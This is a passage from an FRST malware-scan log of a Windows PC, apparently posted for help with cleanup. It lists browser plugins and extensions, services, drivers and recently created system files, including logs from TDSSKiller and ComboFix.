FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-04-29] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-02-27] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2012-10-22] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1764878690-1872824068-2637823629-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kevin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-09-27] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2011-10-02] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-02-27] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll [2010-01-13] (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2013-08-02] (Coupons, Inc.)

Chrome:
=======
CHR Profile: C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default [2016-10-14]
CHR Extension: (Google Slides) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-13]
CHR Extension: (Google Docs) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-13]
CHR Extension: (Google Drive) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-13]
CHR Extension: (YouTube) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-13]
CHR Extension: (Google Search) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-13]
CHR Extension: (Google Sheets) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-13]
CHR Extension: (Google Docs Offline) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-30]
CHR Extension: (Gmail) - C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-13]
CHR HKLM-x32\...\Chrome\Extension: [pacgpkgadgmibnhpdidcnfafllnmeomc] - <no Path/update_url>

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-08-05] (Apple Inc.)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [245760 2010-01-25] (Brother Industries, Ltd.) [File not signed]
S3 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [803856 2016-01-28] (Garmin Ltd. or its subsidiaries)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [923136 2009-05-21] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89864 2014-12-11] (Hewlett-Packard Company)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [325224 2014-09-17] (Intel Corporation)
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2013-12-10] () [File not signed]
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-02-05] (Realtek Semiconductor)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [16776 2011-07-29] () [File not signed]
S3 epmntdrv; C:\Windows\SysWOW64\epmntdrv.sys [14216 2011-07-29] () [File not signed]
S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [9096 2011-07-29] () [File not signed]
S3 EuGdiDrv; C:\Windows\SysWOW64\EuGdiDrv.sys [8456 2011-07-29] () [File not signed]
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-14] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
R3 mv2; C:\Windows\System32\DRIVERS\mv2.sys [12096 2012-06-12] (UVNC BVBA)
S3 pwdrvio; C:\Windows\system32\pwdrvio.sys [19032 2012-08-20] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12384 2012-08-20] ()
R3 RemotePCmirror; C:\Windows\System32\DRIVERS\RemotePCmirror.sys [11368 2012-06-12] (Pro Softnet Crop provider)
R3 RTWlanE; C:\Windows\System32\DRIVERS\rtwlane.sys [1480776 2013-02-08] (Realtek Semiconductor Corporation                           )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [871408 2009-10-17] () [File not signed]
S3 stdpms; C:\Windows\System32\DRIVERS\stdpms.sys [28904 2013-10-22] (Splashtop Inc.)
U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 00:12 - 2016-10-19 00:13 - 00051629 _____ C:\Users\Kevin\Desktop\FRST.txt
2016-10-19 00:11 - 2016-10-19 00:12 - 00000000 ____D C:\FRST
2016-10-19 00:11 - 2016-10-19 00:11 - 02407424 _____ (Farbar) C:\Users\Kevin\Desktop\FRST64.exe
2016-10-14 20:53 - 2016-10-14 20:58 - 00186824 _____ C:\Windows\ntbtlog.txt
2016-10-14 19:59 - 2016-10-14 19:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileASSASSIN
2016-10-14 19:59 - 2016-10-14 19:59 - 00000000 ____D C:\Program Files (x86)\FileASSASSIN
2016-10-14 19:38 - 2016-10-14 19:40 - 00217284 _____ C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt
2016-10-14 19:37 - 2016-10-14 19:38 - 00217270 _____ C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt
2016-10-14 10:17 - 2016-10-14 20:09 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\Oracle
2016-10-10 17:53 - 2016-10-10 17:53 - 00068983 _____ C:\Users\Kevin\Desktop\rental.pdf
2016-10-10 17:21 - 2016-10-10 17:21 - 00194014 _____ C:\Users\Kevin\Desktop\flight.pdf
2016-10-09 22:09 - 2016-10-09 22:09 - 00227000 ____H C:\Windows\system32\mlfcache.dat
2016-10-09 14:44 - 2016-10-09 14:44 - 00637617 _____ C:\Users\Kevin\Desktop\Attachment.pdf
2016-09-24 10:10 - 2016-09-24 11:07 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-09-23 07:32 - 2016-10-15 12:26 - 00000000 ____D C:\Users\Kevin\AppData\LocalLow\uTorrent
2016-09-22 23:58 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-09-22 23:58 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-09-22 23:58 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-09-22 23:58 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-09-22 23:58 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-09-22 23:58 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-09-22 23:58 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-09-22 23:58 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-09-22 23:58 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-09-22 23:58 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-09-22 23:58 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-09-22 23:58 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-09-22 23:58 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-09-22 23:58 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-09-22 23:58 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-09-22 23:58 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-09-22 23:58 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-09-22 23:58 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-09-22 23:58 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-09-22 23:58 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-09-22 23:58 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-09-22 23:58 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-09-22 23:58 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-09-22 23:58 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
